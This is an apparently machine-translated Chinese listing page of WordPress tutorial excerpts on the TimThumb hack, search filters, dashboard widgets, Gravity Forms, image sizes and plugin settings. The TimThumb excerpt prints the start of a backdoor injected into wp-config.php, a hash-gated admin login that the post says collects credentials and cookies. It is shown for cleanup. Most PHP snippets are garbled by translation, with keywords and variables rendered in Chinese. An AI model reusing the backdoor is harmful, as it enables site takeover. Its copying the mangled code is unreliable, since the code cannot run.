文字出版社

所以如果你没有记错的话，8月份的TimThumb脚本存在安全问题。 然而，令我们惊讶的是，许多网站仍然使用旧版本。 在过去一个月里，我们已经确定了三个地点，一个是昨天。 因此，只需逐步撰写文章，这是有道理的，所以我们的用户可以随时关注它。 我们解决这个问题的所有三个用户甚至不知道TimThumb是什么，或者他们是否使用它。 TimThumb是一个调整图像大小的PHP脚本。 它有一个漏洞，但现在使用是安全的。 那么你怎么知道你的网站被黑了呢？ 如果您在访问您的网站时在浏览器上看到红色大屏幕，请执行以下操作： 如果您开始受到关于用户从您的网站重定向的电子邮件轰炸。 最有可能的情况是，您的网站是这个漏洞的受害者。 作为一个谨慎的措施，每个人都应该使用这个Timthumb漏洞扫描器。 这会告诉你是否使用TimThumb的旧版本。 许多主题俱乐部立即升级了他们的核心。 所以这个插件会检查是否安装了Timthumb的新安全版本，或者安装了旧版本。 现在，如果你的网站已经陷入了这个Timthumb的攻击，那么这就是你需要做的。 首先你需要删除下列文件： /wp-admin/upd.php /wp-content/upd.php 登录WordPress管理面板并重新安装WordPress版本。 我们正在专门寻找重新安装这些文件： /wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js 然后打开你的 WP-config.php文件 在那里你很可能会发现这个大的恶意软件代码，正在收集登录凭据和cookie。 这段代码将会走向底部。 if（isset（$ _ GET [‘pingnow’]）&& isset（$ _ GET [‘pass’]））{ if（$ _GET [‘pass’] ==’19ca14e7ea6328a42e0eb13d585e4c22’）{ if（$ _GET [‘pingnow’] ==’login’）{ $ user_login =’admin’; $ user = get_userdatabylogin（$ user_login）; $ user_id = … Read more 如何修复和清理WordPress中的TimThumb Hack

我们最近写了一篇关于如何使用Cryptx加密WordPress的电子邮件的文章。 和这个插件一样有用，实际上有另外一种方法可以做到不涉及任何插件。 我们的一个用户指向WordPress Codex。 虽然大多数人都不知道，但是在WordPress中有一个功能叫做 antispambot 。 这个功能基本上可以让你隐藏你的电子邮件地址，将每个字符转换为一个HTML实体。 所有你需要做的就是在你的主题中任何地方粘贴这样的代码： 不要忘了用自己的电子邮件来替换“[email protected]”，任何垃圾邮件机器人都不能找到它。 来源：WordPress的Codex

你有没有想过如何限制你的搜索结果到特定的帖子类型？ 它不是很难。 我们已经向您展示了如何通过修改functions.php文件来禁用WordPress中的搜索功能。 现在我们要做同样的事情，除了过滤我们的搜索结果。 打开你的functions.php文件并添加下面的代码： 函数searchfilter（$查询）{      if（$ query-> is_search &&！is_admin（））{          $查询 – >集（ ‘post_type’，阵列（ ‘后’， ‘页面’））;      } 返回$查询; } 的add_filter（ ‘pre_get_posts’， ‘searchfilter’）; 注意说的那一行 $查询 – >集（ ‘post_type’，阵列（ ‘后’， ‘页面’））; 您可以通过更改数组变量中的值来过滤搜索结果。 现在它被设置为显示文章和页面，但你可以修改它显示任何你想要的。

你曾经在一个需要你自定义WordPress管理面板的显示的项目吗？ 那么顾问定制的第一件事情就是WordPress仪表盘。 我们向您展示了如何在WordPress中添加自定义仪表板小部件的快速示例。 在本文中，我们将向您展示如何删除WordPress仪表板小部件。 注意：如果你最终在本文中寻找如何去除仪表板小部件，那么你应该看看我们的文章：如何为初学者定制WordPress管理区（仪表板） 您只需将以下代码粘贴到主题的functions.php文件中即可。 尽管将这个文件保存为插件并将其作为插件插件可能是一个好主意。 函数remove_dashboard_widgets（）{ 全球$ wp_meta_boxes; 未设置（$ wp_meta_boxes [ ‘仪表盘’] [ ‘侧’] [ ‘核心’] [ ‘dashboard_quick_press’]）; 未设置（$ wp_meta_boxes [ ‘仪表盘’] [ ‘正常’] [ ‘核心’] [ ‘dashboard_incoming_links’]）; 未设置（$ wp_meta_boxes [ ‘仪表盘’] [ ‘正常’] [ ‘核心’] [ ‘dashboard_right_now’]）; 未设置（$ wp_meta_boxes [ ‘仪表盘’] [ ‘正常’] [ ‘核心’] [ ‘dashboard_plugins’]）; 未设置（$ wp_meta_boxes [ ‘仪表盘’] [ … Read more 如何删除WordPress仪表板小部件

如果你还不知道，重力形式到目前为止是最适合初学者的友好的WordPress联系表单插件。 我们使用它在我们的WordPress图库网站，WordPress优惠券网站，以及几乎所有的新客户。 最近，在客户的网站上工作时，我们不得不调整窗体的样式来匹配要求我们把占位符文本放在Gravity Forms中的设计。 不幸的是，令人惊讶的是，这个功能并不是内置于Gravity Forms（Yet）中的。 虽然他们可以在下拉字段和后置字段：类别中添加占位符文本，但是不能在输入字段和textarea字段中添加占位符。 这对我们来说成了一个巨大的问题。 我们通过重力表格支持区域进行搜索，唯一可用的解决方案是黑客，甚至没有正常工作。 虽然它允许我们把占位符文本，它有重大问题。 如果用户只是点击提交而不实际填充字段，表单将验证而不是返回错误。 经过好的搜索，我们最终找到了解决方案。 在本文中，我们将向您展示如何使用jQuery和Gravity表单过滤器在重力形式中添加占位符文本。 所以你可能想知道为什么我们需要占位符的文本标签在那里？ 那么在我们正在设计的设计中，我们不能使用标签进行造型。 我们所要做的就是使用Gravity Forms过滤器添加一个函数，并使用jQuery来输出文本。 最后的代码 最后的代码如下。 你可以简单地复制并粘贴到你的functions.php文件中并使其工作。 但是如果你想了解更多关于这个功能以及它的工作方式，请继续阅读这篇文章。 也请继续阅读以了解如何在下拉字段中添加占位符文本。 占位符文本 占位符 输入该字段的占位符/默认文本。“>（？） 因此，我们必须做的第一件事是在管理面板中的重力形式字段下添加一个占位符值。 要做到这一点，你需要打开你的主题的functions.php文件并粘贴下面的代码： 占位符文本 占位符 输入该字段的占位符/默认文本。“>（？） 这个小功能将在您的Gravity Forms后端添加占位符文本字段。 示例屏幕截图如下： 现在我们已经在管理面板中添加了这个字段，您可以继续填写所需的文本。 下一步是实际显示实际表单上的文字。 要做到这一点，我们将利用jQuery。 你需要做的就是在你的主题的functions.php文件中粘贴以下代码： / *我们使用jQuery来读取占位符值并将其注入到其字段* / add_action（’gform_enqueue_scripts’，“my_gform_enqueue_scripts”，10，2）; 函数my_gform_enqueue_scripts（$ form，$ is_ajax = false）{ ？> 这将输出占位符文本输入字段和textarea字段，并保持验证。 现在我们已经介绍了这一点，我们仍然需要在我们的下拉字段中添加占位符文本，这个小片段并不适合我们。 谢天谢地，Gravity Forms默认是内置的。 在重力形式下拉字段中添加占位符文本 所有你真正需要做的是创建一个空白值的标签。 是的，当我们第一次听到的时候，这听起来令人困惑。 但事实并非如此。 … Read more 如何在重力形式中添加占位符文本

上个月，在名为TimThumb的着名图像调整脚本中出现了一个巨大的漏洞。 自那时以来，社区已经合作并解决了这个问题。 虽然TimThumb是一个可行的选择，但我们相信WordPress主题开发者应该专注于使用核心功能而不是依靠第三方脚本。 在这篇文章中，我们将向您展示如何在WordPress中添加额外的图片大小。 WordPress有一个内置的功能张贴缩略图又名精选图像。 还有一个内置函数add_image_size（），它可以让你指定图像的大小，并给你选择裁剪。 在主题中使用这些核心功能基本上可以在大多数情况下消除像TimThumb这样的第三方脚本的需要。 注册您的主题的其他图像大小 您将需要通过将以下代码添加到主题的functions.php文件中来添加对帖子缩略图的支持： add_theme_support（’post-thumbnails’）; 启用对帖子缩略图的支持后，现在可以使用功能add_image_size（）注册其他图像大小的功能。 add_image_size函数的用法如下：add_image_size（’name-of-size’，width，height，crop mode）; 示例代码可能如下所示： add_image_size（’sidebar-thumb’，120,120，true）; //硬裁切模式 add_image_size（’homepage-thumb’，220，180）; //软裁切模式 add_image_size（’singlepost-thumb’，590,9999）; //无限高度模式 现在如果你注意到，我们已经指定了三种不同的图像大小。 每个人都有不同的模式，如艰苦的庄稼，柔软的作物，和无限的高度。 因此，让我们介绍每个示例，以及如何使用它们以获得您的好处。 硬作物模式 – 正如你注意到的那样，在高度之后增加了一个“真实”值。 这真正的价值是告诉WordPress将图像裁剪为我们定义的大小（在这种情况下为120 x 120像素）。 这是我们在主题设计中使用很多的方法，以确保一切都是相称的，我们的设计没有打破。 根据尺寸的不同，该功能会自动从侧面或从顶部和底部裁剪图像。 硬裁剪的缺点是你无法控制图像的哪一部分被显示 。 Mike Little进行更正 – 当您上传图片后，在插入图片之前，您可以点击“编辑图片”，然后从那里更改缩略图或整个图片，缩放，旋转或翻转图像，缩略图 选择你想要的图像的确切部分。 软裁切模式 – 默认情况下，软裁剪模式打开，这就是为什么你看不到任何额外的价值增加后的高度。 该方法按比例调整图像的大小，而不会扭曲图像。 所以你可能不会得到你想要的尺寸。 通常它与宽度尺寸相匹配，高度根据每个图像的比例而不同。 示例显示如下所示： 无限高度模式 – 有些时候，你有超长的图像，你想在你的设计中使用，但你想确保宽度是有限的。 我们发现这种图像大小的主要用途是在信息图表上。 信息图往往是非常漫长而充满信息的。 在单个页面上裁剪这样的图像并不是一个好主意。 但天生信息图表比内容宽度更宽。 所以你可以做的是指定一个宽度，不会打破你的设计，而高度是无限的，所以所有的信息图可以没有任何失真地显示。 示例显示如下所示： 在您的WordPress主题中显示其他图片大小 … Read more 如何在WordPress中创建更多的图片大小

你有没有看过像25个最好的XYZ网站的展示？ 通常这些教程有网站名称，网站截图，一个小的描述，以及最近的帖子列表。 这些帖子的主要问题是最近的帖子列表，超时加班，因为大多数作者在写作时手动创建这些链接。 这个帖子真的过时了，其他网站中的任何一个发布了新的帖子。 那么在本文中，我们将向您展示如何通过短代码在WordPress帖子中嵌入外部RSS订阅源，以便您可以保持列表文章的相关性。 首先你需要做的是打开你的主题 的functions.php 文件并粘贴以下代码： //这个文件需要能够使用wp_rss（）函数。 include_once（ABSPATH.WPINC ‘/ rss.php’）; 函数readRss（$ atts）{      提取物（shortcode_atts（阵列（ “feed”=>’http：//’，        “num”=>“1”，      ），$ atts））;      返回wp_rss（$ feed，$ num）; } add_shortcode（’rss’，’readRss’）; 现在你所要做的就是在写一篇文章时使用这个简码： [rss feed =“http://feeds.feedburner.com/site”num =“5”] 确保您将简码中的供稿网址更改为所需内容。 您也可以根据自己的喜好调整数量。 来源：粉碎杂志

关于WordPress的最好的部分之一是插件的可用性，使您的工作作为用户和开发人员容易。 通常在为客户创建网站时，我们作为开发人员使用对网站具有某些功能绝对至关重要的插件。 最近，我们遇到了一个客户的网站被破坏的问题。 侧边栏没有完全加载，单个页面页面上缺少的元素使他们感到困惑。 这个故事的底线是，他们的新员工之一谁是WordPress新的取消激活了一些插件，这是需要的网站才能正常工作。 我们进去并激活了所有已停用的插件，但为了避免将来出现这个问题，我们必须做些事情。 在本文中，我们将向您展示如何从WordPress管理面板禁用插件停用（仅限特定的插件）。 理论上讲，你应该可以使用Justin Tadlock的Members插件，为用户创造新的角色。 但是，我们的客户并不想走这条路。 这是一个小企业，他们雇用这个新员工来处理他们的社交媒体和博客，所以我们不能限制访问。 他们希望能够按照自己的意愿启用/关闭插件。 我们必须找到一种能够让我们的客户满意的方式，而且我们也必须找到一种方法来防止这个问题在将来发生。 感谢Steve Taylor，我们发现了一个片段，可以从指定的插件中删除“停用”链接。 它还删除了所有插件的编辑链接，因为我们不希望我们的客户端通过编辑器编辑任何插件。 所以你所要做的就是在你的主题的functions.php文件中粘贴下面的代码： add_filter（’plugin_action_links’，’disable_plugin_deactivation’，10，4）; function disable_plugin_deactivation（$ actions，$ plugin_file，$ plugin_data，$ context）{ //删除所有的编辑链接 如果（array_key_exists（’edit’，$ actions）） unset（$ actions [‘edit’]）; //删除关键插件的停用链接 if（array_key_exists（’deactivate’，$ actions）&& in_array（$ plugin_file，array（ ‘Facebook的开放式图形的间位在-的wordpress / fbogmeta.php’， ‘WP-pagenavi /可湿性粉剂pagenavi.php’ ））） unset（$ actions [‘deactivate’]）; 返回$操作; } 现在，您需要更改$ plugin_file的数组，您可以在其中看到指定插件的列表。 该文件的路径是相对于/ wp-content / plugins /。 所以在上面的例子中，“facebook-open-graph-meta-in-wordpress / … Read more 如何从WordPress管理面板禁用插件停用

通常，当插件需要使用自定义字段并在后台工作时，作者通过向名称添加下划线来隐藏它们。 这使得他们的插件可以顺利运行而不会中断。 但是如果你是一个试图调试某个东西的开发者，或者只是一个好奇的学习者，那么你可能想知道插件添加的所有东西。 在这篇文章中，我们将向您展示如何在WordPress中显示隐藏的自定义字段。 所有你需要做的就是打开你的主题的functions.php文件，并放在这里的代码： add_action（’admin_head’，’showhiddencustomfields’）; 函数showhiddencustomfields（）{ 回声“ “; } 但是，通过粘贴代码，您仅限于特定的主题。 如果你想切换主题，那么你将不得不重新添加这个代码。 所以你可以简单地创建一个PHP文件，并将代码保存在那里，并将其作为插件上传。 或者你可以简单地使用显示隐藏的自定义字段 这个惊人的技巧所有的信贷去Viper007Bond。

你有没有想过是否有一种方法来自动灰度图像在WordPress上传时？ 那么这个奇怪的时间结束了。 在本文中，我们将向您展示如何使用一些简单的PHP图像处理工具和WordPress功能来自动上传灰度图像。 你可以使用灰度图像悬停，滑块，画廊，或任何你喜欢的东西。 你需要做的第一件事是打开你的主题的functions.php文件，并添加下面的代码： ADD_ACTION（ ‘after_setup_theme’， ‘themename_bw_size’）; 函数themename_bw_size（）{ add_image_size（’themename-bw-image’，100，100，true）; } 上面的代码只是为上传者添加了一个额外的图片大小。 硬裁剪的大小设置为100 x 100像素。 您可以更改尺寸以适应您的需求。 一旦你完成了，你需要添加下面的代码： 的add_filter（ ‘wp_generate_attachment_metadata’， ‘themename_bw_filter’）; 函数themename_bw_filter（$ meta）{ $ file = wp_upload_dir（）; $ file = trailingslashit（$ file [‘path’]）。$ meta [‘sizes’] [‘themename-bw-image’] [‘file’]; 列表（$ orig_w，$ orig_h，$ orig_type）= @getimagesize（$ file）; $ image = wp_load_image（$ file）; imagefilter（$ image，IMG_FILTER_GRAYSCALE）; 开关（$ orig_type）{ case IMAGETYPE_GIF： imagegif（$ image，$ … Read more 如何在WordPress的灰度图像